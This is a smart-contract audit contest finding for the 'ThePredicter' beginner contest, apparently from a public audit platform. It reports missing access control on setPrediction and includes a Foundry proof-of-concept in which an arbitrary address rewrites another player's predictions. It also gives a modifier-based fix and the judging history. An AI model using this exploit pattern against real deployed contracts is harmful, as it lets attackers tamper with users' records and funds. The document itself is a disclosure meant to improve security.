First Flight #20: The Predicter
First Flight #20
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Only the ThePredicter contract can call setPrediction

bytesflow007

Summary

setPrediction lack the validation: only the ThePredicter contract can cal it.

Vulnerability Details

As lacking the validation, anyone can call this function, modify the orginal results

Impact

Player will lost their all profit.

Tools Used

manual

// player scores can bes modified by others
function test_poc_scoresModifyByOthers() public {
vm.startPrank(stranger);
vm.deal(stranger, 0.0003 ether);
vm.stopPrank();
vm.warp(2);
vm.startPrank(organizer);
scoreBoard.setResult(0, ScoreBoard.Result.First);
vm.stopPrank();
vm.startPrank(stranger);
thePredicter.makePrediction{value: 0.0001 ether}(
0,
ScoreBoard.Result.First
);
vm.stopPrank();
vm.warp(3);
vm.startPrank(organizer);
scoreBoard.setResult(1, ScoreBoard.Result.Draw);
vm.stopPrank();
vm.startPrank(stranger);
thePredicter.makePrediction{value: 0.0001 ether}(
1,
ScoreBoard.Result.Second
);
vm.stopPrank();
vm.warp(4);
vm.startPrank(organizer);
scoreBoard.setResult(2, ScoreBoard.Result.First);
vm.stopPrank();
vm.startPrank(stranger);
thePredicter.makePrediction{value: 0.0001 ether}(
2,
ScoreBoard.Result.First
);
vm.stopPrank();
vm.warp(5);
vm.startPrank(organizer);
scoreBoard.setResult(3, ScoreBoard.Result.First);
vm.stopPrank();
assertEq(scoreBoard.getPlayerScore(stranger), 3);
// maliciousUser
address maliciousUser = makeAddr("maliciousUser");
vm.startPrank(maliciousUser);
scoreBoard.setPrediction(stranger, 0, ScoreBoard.Result.Draw); // First =>Draw
scoreBoard.setPrediction(stranger, 1, ScoreBoard.Result.First); //Draw => First
scoreBoard.setPrediction(stranger, 2, ScoreBoard.Result.Second); //First => Second
vm.stopPrank();
assertEq(scoreBoard.getPlayerScore(stranger), -3);
}
}

Recommendations

setPrediction add modifier onlyThePredicter, only the ThePredicter can call.

function setPrediction(
address player,
uint256 matchNumber,
Result result
) public onlyThePredicter {
if (block.timestamp <= START_TIME + matchNumber * 68400 - 68400)
playersPredictions[player].predictions[matchNumber] = result;
playersPredictions[player].predictionsCount = 0;
for (uint256 i = 0; i < NUM_MATCHES; ++i) {
if (
playersPredictions[player].predictions[i] != Result.Pending &&
playersPredictions[player].isPaid[i]
) ++playersPredictions[player].predictionsCount;
}
}
Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement

Appeal created

bytesflow007 Submitter
about 1 year ago
NightHawK Lead Judge
about 1 year ago
bytesflow007 Submitter
about 1 year ago
NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.